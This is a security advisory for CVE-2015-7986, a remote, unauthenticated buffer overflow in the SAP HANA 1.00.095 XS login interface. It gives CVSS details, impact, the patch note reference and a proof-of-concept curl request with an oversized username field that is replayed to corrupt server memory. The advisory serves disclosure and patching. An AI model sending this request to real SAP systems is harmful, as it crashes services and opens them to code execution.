Application: SAP HANA
Versions Affected: SAP HANA 1.00.095
Vendor URL: http://www.sap.com
Bugs: RCE, Memory corruption
Vendor response: 18.07.2015
Date of Public Advisory: 13.10.2015
Reference: SAP Security Note 2197428
Authors: Mathieu Geli (ERPScan)
Class: Memory corruption, RCE
Impact: full system compromise
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-7986
CVSS Base Score: 9.3 / 10
CVSS Base Vector:
|AV: Access Vector (Related exploit range)||Network (N)|
|AC: Access Complexity (Required attack complexity)||Medium (M)|
|Au: Authentication (Level of authentication needed to exploit)||None (N)|
|C: Impact to Confidentiality||Complete (C)|
|I : Impact to Integrity||Complete (C)|
|A: Impact to Availability||Complete (C)|
An attacker can use remote command vulnerability to execute commands remotely without authorization, under the privileges of the service that executes them. The attacker can access arbitrary files and directories located in an SAP server filesystem, including application source code, configuration, and critical system files. It allows obtaining critical technical and business-related information stored in a vulnerable SAP system.
A buffer overflow vulnerability exists in SAP HANA interface. If an attacker has a network access to the SQL interface or the SAP HANA Extended Application Services interface of an SAP HANA system, the vulnerability enables the attacker to inject code into the working memory that is subsequently executed by the application. It can also be used to cause a general fault in the product causing the product to terminate.
Proof of concept
This authentication request should be replayed 10 times.
curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H 'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-csrf-token: unsafe' -d 'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
SAP HANA 1.00.095.00
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2197428.
An anonymous attacker can use a special HTTP request to corrupt SAP HANA index server memory.
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: